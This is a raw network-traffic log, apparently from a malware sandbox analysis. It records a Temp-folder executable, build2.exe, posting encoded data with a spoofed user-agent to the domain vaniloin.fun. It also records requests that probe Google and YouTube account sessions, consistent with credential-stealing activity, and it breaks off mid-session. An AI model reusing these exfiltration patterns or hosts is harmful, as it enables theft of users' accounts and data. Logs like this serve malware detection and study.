2024-07-26 15:57:41 UTC	15331	OUT	Data Raw: 2c 2c 90 86 2b 2f 59 41 e4 5a fc 32 34 e0 36 1e 30 1e 04 63 93 79 f3 1f 00 5d b4 6e e8 d0 e8 c2 01 e0 41 14 38 98 2a 57 66 11 69 48 1f 38 54 aa 65 83 c7 ae 01 70 83 00 ac ac 91 f8 f0 f2 76 6a 14 bb 8d 14 01 05 c7 23 5e 43 90 91 e1 0e ba 61 14 71 1b 54 0e 1e 0c a5 c5 4e 0a b6 01 43 75 ab ee 93 32 e0 01 91 61 9d fa 14 ae 27 8d f3 28 0a bf 5f 07 22 06 49 1b fc 16 f1 b6 b5 cb 34 1a 9f 0d 97 e7 6e 36 ac 2f d1 8f 72 ea d0 95 aa 88 4d cb 1d 80 86 89 44 a6 7c bd 68 f4 20 9b 34 a7 28 bb 15 f5 81 94 8b 5f be 2b a0 74 dd 28 a1 c1 68 48 48 ac 70 a8 36 0d 9e 45 d7 a9 4c 3c bc 9c e5 35 14 35 b6 08 d5 e0 c5 ae 05 18 4e cc b4 54 43 3c 4f 93 ca 24 48 27 05 20 c5 b8 f9 a5 63 3e e8 96 2b c0 6f 90 3e 0f 75 47 af 29 78 64 5a dd 6f 13 a1 87 9e a2 a1 ec 7d ba be f1 db 78 12 ba Data Ascii: ,,+/YAZ2460cy]nA8*WfiH8Tepvj#^CaqTNCu2a'(_"I4n6/rMD\|h 4(_+t(hHHp6EL<55NTC<O$H' c>+o>uG)xdZo}x
2024-07-26 15:57:41 UTC	15331	OUT	Data Raw: 0c 4a 43 f4 02 e2 49 f5 e0 a4 9d 06 a1 41 e4 65 b5 00 ff 3f 59 29 c8 82 1b b2 e2 c9 26 71 41 34 42 86 f2 24 55 2f 74 27 96 78 02 d2 ca a7 97 ae 95 4b a8 44 00 b2 da 4a 32 3a 7c 6f 1e d6 d0 d2 fa 18 4e bd 17 ef d4 fb 01 8b 95 39 08 73 d1 5f 11 c0 e0 80 87 2a ce e8 33 9f b5 3b 5b 2e 02 2d 82 a5 17 ef 94 5c 12 43 b6 b6 26 f1 ae 07 90 56 37 bc d6 96 46 79 9d 46 a8 6c a9 42 cf f2 40 91 44 d8 b1 02 e9 87 a0 bc c2 9c 72 d4 86 6d 1a 3b 67 64 3b 00 0a d0 a8 19 2f 87 83 ef 58 44 60 d2 95 a7 3f 07 75 8d e0 81 7c d2 99 ab a2 fd 71 fd ca cb 4a 8f d1 2e 38 e1 d1 1e c4 b5 61 00 ea 6b ac 6d ca b1 e2 f5 8c 42 38 b9 8d fa c7 76 fa e6 99 b3 a0 53 05 d0 4d 0a 63 42 30 eb 51 1b c2 71 d2 9c 5c e7 4c 90 36 53 4a 35 13 1f 7e 34 74 b1 96 2b f2 06 f2 16 99 20 f7 03 ba e4 50 1f 9f Data Ascii: JCIAe?Y)&qA4B$U/t'xKDJ2:\|oN9s_*3;[.-\C&V7FyFlB@Drm;gd;/XD`?u\|qJ.8akmB8vSMcB0Qq\L6SJ5~4t+ P
2024-07-26 15:57:41 UTC	15331	OUT	Data Raw: 0f 67 dc d2 ce b0 a7 ab e3 49 29 37 7e e1 d0 58 80 32 5f 12 8c 12 89 0e 41 c7 83 72 f1 6e a9 87 fe f3 fa c9 89 f8 3a f7 4d fd d5 00 5d de f1 f9 f1 47 77 76 92 04 0b 24 96 91 38 7c 32 4f f1 ef db 91 f6 65 cd 26 47 eb ca f5 30 0f e4 26 b0 23 86 ac 68 ae 09 01 18 be e3 e5 26 4b 37 b6 2c f0 67 4e 4a 10 5d 3d 68 d7 9a b7 96 26 8c cf ca cf f5 48 e7 31 ad 03 a6 5f c5 d3 e8 67 62 68 0e 70 57 c3 c0 63 6b 2f 36 28 d9 1e 0b 94 03 6e 79 4d 54 a6 b3 ed 92 2d 7c 4c d5 77 9a 84 38 25 51 af 6c 98 24 5c 72 7c fd 9b 3c 5e 1c 61 6c 2d f3 e0 53 33 7b cd 8f f3 7b 5d 7d fc 7e e7 a6 c7 93 fd a8 d2 c5 df 77 00 f6 3c cb b4 a7 dc 8a fb 87 fe 63 bc 25 a5 c6 d6 62 c5 5b bb 89 ba 97 79 fb bb cf 5c f3 17 ae f6 f9 8d c6 bd 57 7a 4a 4f 9f 93 e0 01 b8 0a 1c f1 c2 0d db 56 2b 29 37 6b d6 Data Ascii: gI)7~X2_Arn:M]Gwv$8\|2Oe&G0&#h&K7,gNJ]=h&H1_gbhpWck/6(nyMT-\|Lw8%Ql$\r\|<^al-S3{{]}~w<c%b[y\WzJOV+)7k
2024-07-26 15:57:41 UTC	15331	OUT	Data Raw: df ca fc 8b 70 40 b4 a2 e0 c2 86 93 0a 0e b9 f5 fb ce 05 db af 97 d5 e0 51 33 58 e7 b6 9d bc 77 83 8c 4c b7 c8 bf 3b 1f 67 91 a3 e7 a3 f2 72 2f 84 7a 90 b9 5e b4 8d a8 f9 da 9d 7c 77 ab df f4 a6 88 44 2f fb f7 15 5a f6 c5 55 1e 82 9a e2 fc de 81 b2 12 29 b6 32 78 59 40 4e b1 eb dd c9 96 10 19 fc 9b d6 c1 0d 6d 04 f1 74 76 50 14 94 04 9d 84 24 01 05 c7 47 26 13 c0 78 fe 3b 19 a2 8b d5 99 46 02 2a fc aa 49 14 81 ff af 03 27 1c 8c 2e 01 8d 2d b6 08 f8 03 e1 57 44 42 fd 13 b2 e3 a3 fd 89 d4 74 07 65 9b 23 30 18 1a 41 84 14 65 90 d8 1d d2 c1 02 6f 02 40 db 10 5e fc 6b 37 a1 b1 9a da 49 4a 5b 54 a5 b0 b6 ad b1 3c 69 53 c6 c3 9e 3c 55 66 3f c0 9f ae fb 06 39 77 2b 1b be 06 64 6d c9 ae 01 98 89 75 47 4d 36 1e 17 de b0 09 d4 5e 2f 79 9d d9 bd 08 ae 3e 7a 69 4f eb Data Ascii: p@Q3XwL;gr/z^\|wD/ZU)2xY@NmtvP$G&x;F*I'.-WDBte#0Aeo@^k7IJ[T<iS<Uf?9w+dmuGM6^/y>ziO
2024-07-26 15:57:41 UTC	15331	OUT	Data Raw: a6 2b a6 88 ae 78 57 83 02 f4 66 54 2b 46 74 56 ae 8c 7d 39 a3 4a 9b fb 3f 7f d9 ca 5f 52 c3 01 22 ed 02 bb 79 a4 38 21 5f 33 33 57 7f 45 71 f3 e7 7e 1a 88 ff be f7 31 f4 df 8b c0 c2 55 64 cf ae cc ae f0 36 06 0a fb fc 04 70 c1 ae 5d 6a 1c 60 56 81 02 33 ff a8 2c 7d 7f 2b 4b d5 44 57 60 78 9d e0 cc 36 f3 ba b8 fe 8c a3 e4 bf e6 36 c9 2d 72 f1 98 52 ac 36 8d ef af 62 24 70 a7 84 36 0c 44 a2 02 df 81 01 d7 c3 39 e9 2c 56 08 34 96 84 95 14 82 cb e1 43 a1 fe fb 0e 14 b9 ae 7d 1d c1 90 c6 f1 89 92 2c 1e 0a ea 91 b2 38 a1 b4 0f b7 55 01 d6 c8 ab 0b a6 c3 c1 37 fe 1b f5 41 c1 f1 d1 01 21 e3 d1 09 14 ac fd 40 ac dc ad 8e f1 94 6c 33 86 20 44 30 50 db 56 2b 1d 1c 8c 17 3f 28 88 06 4d 73 ee e8 7b 9d a4 42 fb 0f d3 2c 63 79 55 24 78 a8 8a bc aa 12 fc da b4 00 44 11 Data Ascii: +xWfT+FtV}9J?_R"y8!_33WEq~1Ud6p]j`V3,}+KDW`x66-rR6b$p6D9,V4C},8U7A!@l3 D0PV+?(Ms{B,cyU$xD
2024-07-26 15:57:41 UTC	8313	OUT	Data Raw: cc 29 9e a1 51 aa 72 98 33 2b a0 e5 b3 19 8a 0a 1c 91 61 82 d9 08 79 81 02 1c 79 ce 4e 4f 70 c1 0f 71 99 11 76 1c 21 d2 b5 6e 87 fd bd cb ca eb 0b 90 0c 3a 2d f1 ba a0 2d b8 bc 91 c7 00 3e c4 d3 6c 76 38 40 7a 01 06 cc dc 88 d8 aa c1 00 d2 38 81 f0 15 0f 5a d0 74 77 75 4c ed 71 87 ff d9 9d 35 c4 c8 c6 b9 9d 7f c1 56 fd 5c 84 59 19 66 bc 99 d4 be aa 6c 5b 99 58 c1 00 c1 bf a3 60 64 f3 05 ef 3e c4 34 5c 6c eb 35 1c 6d 91 5d ec 83 ff 85 4e a6 72 ec f2 e2 13 31 4a 78 5e 8d 02 56 fe 4e be 87 be c9 8a 66 78 72 af de e5 8a 1d c2 fa 7f c1 01 8d b6 19 ff 84 ec 78 1d 06 64 20 22 2f 00 1c f0 7c e6 13 8b 02 3b 11 16 97 3e 7c fe 12 d3 c8 4f a9 20 0e e9 2f 97 39 f9 91 fd 4e 74 d9 89 bf c4 c6 b8 5f 87 02 32 66 ce 79 70 c1 1b 0e b2 c8 c6 d8 f5 27 e6 fb 4d 57 ff e6 58 25 Data Ascii: )Qr3+ayyNOpqv!n:-->lv8@z8ZtwuLq5V\Yfl[X`d>4\l5m]Nr1Jx^VNfxrxd "/\|;>\|O /9Nt_2fyp'MWX%
2024-07-26 15:57:42 UTC	568	IN	HTTP/1.1 204 No Content Date: Fri, 26 Jul 2024 15:57:42 GMT Connection: close slug: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YAsg2ysGfY4UStlheB1r7EJOcKRD3NB%2FIkXwVzlIRzROkX24UdQ02w%2FAld4kP%2FiJLn2nBxI5fx977iIH9QiQHxiB4UCcUjQTATvDjWAL8sIAKTjny6UwRb%2FrxLsTTaU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a95963dce1a0f79-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	61302	104.21.72.79	443	7964	C:\Users\user\AppData\Local\Temp\1000028001\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:42 UTC	514	OUT	POST /Windows-Users-in-Eastern-Europe-to-Get-2011-Time-Zone-Update-in-December-225923.shtml?kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.4.13 Chrome/114.0.5735.289 Electron/25.8.1 Safari/537.36 id: ktXFBAA8pEqbLdzvFFQyZi39Ak7iUqVDm4sWK64zNUY/bDXe Content-Length: 35 Host: vaniloin.fun
2024-07-26 15:57:42 UTC	35	OUT	Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-07-26 15:57:42 UTC	506	IN	HTTP/1.1 204 No Content Date: Fri, 26 Jul 2024 15:57:42 GMT Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JBpVgjucmcblg6%2F3s8vVQT2LnetnFINIWasxEt8zjuq3mnbhf1cuROuACnr22AQ1ArnoQG2gwbJqrWDcyWRCY5H88vlHBXMs8jLT2TX6yWDhexZVeBxh0W8nXV34aq4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a959645b90a0f55-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	61311	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:45 UTC	491	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 15:57:45 UTC	1	OUT	Data Raw: 20 Data Ascii:
2024-07-26 15:57:46 UTC	1884	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:46 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-7d64I46AccCPYANYp6w_Ww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzj0tHikmJw1ZBiOHxtB5Meyy0mIyA-GPec6SgQO6XPYA0B4iURF1mPJF5kFeLm-NXXv5VNYMbrP5ZKukn5hfGZKal5JZkllTmZxSWJycn5pXklxcWpRWWpRfFGBkYmBuZGhnoGFvEFBgDdyyZQ" Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-26 15:57:46 UTC	23	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2024-07-26 15:57:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	61319	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:47 UTC	1539	OUT	GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en HTTP/1.1 Host: accounts.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmation sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 15:57:47 UTC	2075	IN	HTTP/1.1 302 Found Content-Type: application/binary Set-Cookie: __Host-GAPS=1:LYHKDd3zseErEFB9_nba7XBg1Is9-w:UN_hHMbC-ffQw73q; Expires=Sun, 26-Jul-2026 15:57:47 GMT; Path=/; Secure; HttpOnly; Priority=HIGH Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:47 GMT Location: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74EGyOtYhtIedH616HDdleWeyvx-W5gVjR9WtunrFrzD7YvzKdhr32YF_YLRBX-ZKofQnLR Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-7WjIYc0qlmhhThoKl9PQ9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsSigninPassiveLoginHttp/cspreport/allowlist Cross-Origin-Opener-Policy: unsafe-none Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Resource-Policy: cross-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	61323	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:47 UTC	1686	OUT	GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74EGyOtYhtIedH616HDdleWeyvx-W5gVjR9WtunrFrzD7YvzKdhr32YF_YLRBX-ZKofQnLR HTTP/1.1 Host: accounts.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmation sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __Host-GAPS=1:LYHKDd3zseErEFB9_nba7XBg1Is9-w:UN_hHMbC-ffQw73q
2024-07-26 15:57:48 UTC	1575	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Set-Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG;Path=/;Expires=Sun, 26-Jul-2026 15:57:48 GMT;Secure;HttpOnly;Priority=HIGH X-Frame-Options: DENY Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:48 GMT Location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76l5PHSkuJEfmntRfpXyKF9d2CZ3ZVNDVHTO0EGAn7_bo5ZGw98nP2MHND84A-DOFk_AEPt&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1609852158%3A1722009468052145&ddm=0 Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-0ORe40b3yyEiBJsQ1UwGmg' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk" Content-Length: 694 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 15:57:48 UTC	694	IN	Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 76 33 2f 73 69 67 6e 69 6e 2f 69 64 65 6e 74 69 66 69 65 72 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 Data Ascii: <HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Temporarily</H1>The document has moved <A HREF="https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fww

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	61325	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:48 UTC	1223	OUT	GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB HTTP/1.1 Host: accounts.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.2045.47" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 15:57:48 UTC	2081	IN	HTTP/1.1 302 Found Content-Type: application/binary Set-Cookie: __Host-GAPS=1:cY5PKz9MbVTxyb_QHqRZDIZlkUnjpA:0TC6_Szd8-bCfOg8; Expires=Sun, 26-Jul-2026 15:57:48 GMT; Path=/; Secure; HttpOnly; Priority=HIGH Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:48 GMT Location: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&passive=true&service=youtube&uilel=3&ifkv=AdF4I77JJecr6ta97roWSm-mOllhy7zkkIlEoZhfQMAzUiZ_geBAmJooKmRonrrr_5dCiY3t66v8 Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-ssWfj3WqD-MnRObHBoenkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsSigninPassiveLoginHttp/cspreport/allowlist Cross-Origin-Opener-Policy: unsafe-none Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Resource-Policy: cross-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	61330	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
